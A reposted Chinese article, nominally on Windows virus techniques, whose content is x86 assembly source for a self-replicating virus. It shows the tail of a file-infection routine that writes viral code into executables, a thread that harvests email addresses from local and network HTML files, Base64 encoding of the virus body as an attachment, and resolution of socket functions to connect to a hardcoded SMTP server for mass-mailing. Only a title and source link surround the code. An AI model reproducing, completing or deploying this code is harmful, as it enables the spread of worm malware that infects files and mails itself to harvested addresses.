Win9x/Winnt/Win2k/Winxp病毒技术探讨
push 0
lea eax,ByteWrite
push eax
push [edi].SizeOfRawData
lea eax,[offset VStart+ebx]
push eax
push hFile
mov eax , 12345678h
_WriteFile = dword ptr $-4
call eax
IF_F1:
push pMapping
mov eax , 12345678h
_UnmapViewOfFile = dword ptr $-4
call eax
IF_F2:
push hMapping
call _CloseHandle[ebx]
IF_F3:
push hFile
call _CloseHandle[ebx]
IF_Exit:
popad
ret 4
InfectFile ENDP
;*****************电子邮件传播线程***************************
;从本地、网络的*.htm*获得邮件地址.
;***********************************************************
MailThread:
call MailInit
MT_Work:
push FILE_HTM
@pushsz "c:"
call EnumDisk
push 1000*60*60*24 ;sleep a day :)
call _Sleep[ebx]
jmp short MT_Work
;*********************************************************
;Mutate virus to BASE64 only once
;*********************************************************
MailInit PROC
LOCAL hFile : DWORD
LOCAL hMapping : DWORD
LOCAL pMapping : DWORD
pushad
xor edi,edi
push edi
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push edi
push FILE_SHARE_READ
push GENERIC_READ
lea eax,[offset szFilePath+ebx]
push eax
call _CreateFile[ebx]
mov hFile,eax
push edi
push edi
push edi
push PAGE_READONLY
push edi
push eax
call _CreateFileMapping[ebx]
mov hMapping,eax
push edi
push edi
push edi
push FILE_MAP_READ
push eax
call _MapViewOfFile[ebx]
mov pMapping,eax
push PAGE_READWRITE
push MEM_RESERVE or MEM_COMMIT
push SIZEOF_VIRUS_FILE*2
push edi
call _VirtualAlloc[ebx]
mov Base64_Encoded_Data[ebx],eax
mov esi,pMapping
mov edi,Base64_Encoded_Data[ebx]
call EncodeBase64
@pushsz "WSOCK32.DLL"
call _LoadLibraryA[ebx]
xchg eax,edi ;hSockDll
@pushsz "WSAStartup"
push edi
call _GetProcAddress[ebx]
lea esi,[offset WSA_Data+ebx]
push esi
push 0202h ;!!!warning 2.2
call eax
@pushsz "socket"
push edi
call _GetProcAddress[ebx]
mov [offset _socket+ebx],eax
@pushsz "gethostbyname"
push edi
call _GetProcAddress[ebx]
@pushsz "pact518.hit.edu.cn"
call eax
mov esi,[eax+12]
lodsd
push [eax]
pop [offset ServIP + ebx]
@pushsz "connect"
push edi
call _GetProcAddress[ebx]
mov [offset _connect+ebx],eax
@pushsz "send"
push edi
call _GetProcAddress[ebx]
mov [offset _send+ebx],eax
@pushsz "closesocket"
push edi
call _GetProcAddress[ebx]
mov [offset _closecsoket+ebx],eax
MI_Close3:
push pMapping
call _UnmapViewOfFile[ebx]
MI_Close2:
push hMapping
call _CloseHandle[ebx]
MI_Close:
push hFile
call _CloseHandle[ebx]
MI_Exit:
popad
ret
MailInit ENDP
;**********************************
;esi <- Buffer with data to encode
;edi <- Destination buffer
;**********************************
EncodeBase64 Proc
LOCAL BASE64_lines : DWORD
xor ecx,ecx
mov BASE64_lines,ecx
cld
BASE64encode_loop:
cmp ecx,SIZEOF_VIRUS_FILE
jae BASE64__exit
xor edx,edx
mov dh,byte ptr [esi+ecx]
inc ecx
cmp ecx,SIZEOF_VIRUS_FILE
jae BASE64__00
mov dl,byte ptr [esi+ecx]
BASE64__00:
inc ecx
shl edx,08h
cmp ecx,SIZEOF_VIRUS_FILE
jae BASE64__01
mov dl,byte ptr [esi+ecx]
BASE64__01:
inc ecx
mov eax,edx
and eax,00fc0000h
shr eax,12h
mov al,byte ptr [eax+offset Base64DecodeTable+ebx]
stosb
mov eax,edx
and eax,0003f000h
shr eax,0Ch
mov al,byte ptr [eax+offset Base64DecodeTable+ebx]
stosb
mov eax,edx
and eax,00000fc0h
shr eax,06h
mov al,byte ptr [eax+offset Base64DecodeTable+ebx]
stosb
mov eax,edx
and eax,0000003fh
mov al,byte ptr [eax+offset Base64DecodeTable+ebx]
stosb
cmp ecx,SIZEOF_VIRUS_FILE
jbe BASE64__02
mov byte ptr [edi-00000001h],"="
BASE64__02:
cmp ecx,SIZEOF_VIRUS_FILE+01h
jbe BASE64__03
mov byte ptr [edi-00000002h],"="
inc BASE64_lines
cmp BASE64_lines,00000013h
jne BASE64encode_loop
mov ax,0A0Dh
stosw
mov BASE64_lines,00000000h
BASE64__03:
jmp BASE64encode_loop
BASE64__exit:
mov ax,0A0Dh
stosw
ret
EncodeBase64 EndP
;**********************************************
;发送邮件函数
;1. 连接SMTP Server
;2. 发送协议信息,发送BASE64编码的附件,发送其余数据
;warning: 发送数据的长度
;**********************************************
文章转载地址:http://www.cnpaf.net/Class/Virus/05122020353931644805.htm
